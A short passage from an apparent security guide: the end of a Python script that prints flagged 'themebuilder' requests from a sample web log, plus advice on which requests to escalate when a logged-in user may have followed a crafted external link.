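    return findings


if __name__ == "__main__":
    for f in suspicious_themebuilder_requests(SAMPLE_LOG):
        print(f["time"], f["ip"], "rendered" if f["rendered"] else "not rendered", repr(f["value"]))
```

A flagged request with status 200 and an off-site referer is the pattern to escalate, since it suggests a logged-in user followed an external link to the crafted URL.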